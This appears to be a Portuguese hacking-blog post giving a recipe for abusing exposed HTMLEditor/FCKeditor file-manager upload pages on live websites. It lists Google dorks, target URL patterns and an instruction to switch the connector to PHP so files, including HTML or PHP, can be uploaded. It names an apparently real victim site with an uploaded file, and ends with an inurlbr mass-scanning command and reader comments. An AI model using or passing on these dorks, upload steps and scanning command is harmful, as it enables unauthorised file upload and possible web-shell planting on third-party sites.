Explorando HTMLEditor
DORK[0]=> inurl:/HTMLEditor/editor/
DORK[1]=> inurl:/HTMLEditor/editor//filemanager/
DORK[2]=> inurl:/HTMLEditor/editor//filemanager//connectors/
DORK[3]=> inurl:HTMLEditor & "Index of"
DORK[4]=> inurl:"connectors/uploadtest.html" & "Index of"
DORK[5]=> inurl:"/editor/filemanager/" ext:html
DORK[6]=> inurl:"/filemanager/" "Resource Type"
http://www.target.com/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or
http://www.target.com/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Mude o conectar para PHP ele vai efetuar o upload.
Suporte de arquivos: TXT e JPG em algums sites você pode fazer upload HTML e PHP demais.
O arquivo upado pode ser encontrado em:
http://www.target.com/PowerCMS%20folder/files/SEU_ARQUIVO.ALVO
or
http://www.target.com/patch//PowerCMS%20folder/files/SEU_ARQUIVO.ALVO
Ex:
http://thymeoncavill.com.au/CMS/HTMLEditor/editor/filemanager/connectors/uploadtest.html
UPLOAD=>
http://thymeoncavill.com.au/CMS/files/10487462_686112868144329_1233575004575245355_n.jpg
Exemplo de uso SCANNER INURLBR
COMANDO=>{./inurlbr.php --dork 'inurl:"/filemanager/" "Resource Type"' -q 1,6 -s fkeditor.txt -t 2 --replace='/filemanager/[INURL]/filemanager/connectors/uploadtest.html?' -a '
}
Resultado:
BAIXAR SCANNER INURLBR
https://github.com/googleinurl/SCANNER-INURLBR
https://github.com/googleinurl/SCANNER-INURLBR
Este comentário foi removido por um administrador do blog.
ResponderExcluirMas o que podemos fazer up txt?
ResponderExcluir